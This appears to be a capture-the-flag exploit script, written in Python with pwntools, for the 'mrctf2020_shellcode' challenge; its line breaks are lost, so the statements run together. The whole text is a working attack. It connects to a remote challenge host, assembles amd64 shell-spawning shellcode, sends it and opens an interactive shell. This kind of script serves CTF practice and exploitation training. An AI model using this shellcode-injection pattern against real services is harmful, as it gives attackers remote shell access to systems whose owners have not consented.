from pwn import*context.arch = 'amd64'io = remote("node4.buuoj.cn",25647)elf=ELF('./mrctf2020_shellcode')shellcode = asm(shellcraft.sh())io.sendline(shellcode)io.interactive()